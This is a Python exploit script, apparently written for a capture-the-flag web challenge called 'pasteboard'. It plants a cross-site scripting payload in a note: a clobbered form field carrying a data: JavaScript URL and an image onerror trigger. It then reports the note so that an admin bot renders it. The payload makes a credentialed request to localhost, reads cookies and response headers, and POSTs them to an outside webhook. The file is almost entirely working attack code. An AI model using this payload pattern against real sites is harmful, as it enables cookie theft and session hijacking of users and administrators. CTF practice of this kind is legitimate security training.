import requests

BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"  
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# Alternative: Use XHR which has better access to response details
# Or use an img/iframe to leak via error messages
# Or make bot post a form to our webhook with credentials included

payload = f'''<form id="errorReporter"><input name="path" value="data:text/javascript,
var xhr = new XMLHttpRequest();
xhr.withCredentials = true;
xhr.open('GET', 'http://127.0.0.1:5000/', false);
xhr.send();
var response = xhr.responseText;
var allCookies = document.cookie;
fetch('https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078/XHR', {{
  method: 'POST',
  body: JSON.stringify({{
    cookies: allCookies,
    responseHeaders: xhr.getAllResponseHeaders(),
    response: response.substring(0, 1000)
  }})
}});
"></form>
<img id="renderConfig" src=x onerror="window.lastRenderError='x';throw new Error()">'''

print("[*] Using XMLHttpRequest to capture response headers...")
print()

session = requests.Session()
resp = session.post(
    f"{BASE_URL}/note/new",
    data={"title": "XHR", "body": payload},
    allow_redirects=False
)

if resp.status_code == 302:
    location = resp.headers.get('Location')
    note_url = f"{BASE_URL}{location}"
    
    print(f"[+] Created: {note_url}")
    
    report = session.post(f"{BASE_URL}/report", data={"url": location})
    if report.status_code == 202:
        print(f"[+] Reported!")
        print()
        print("[*] Check webhook for POST to /XHR")
        print("[*] responseHeaders might contain Set-Cookie!")
        print("    https://webhook.site/#!/d8111fd3-599a-47ab-bcab-94d5ec54e078")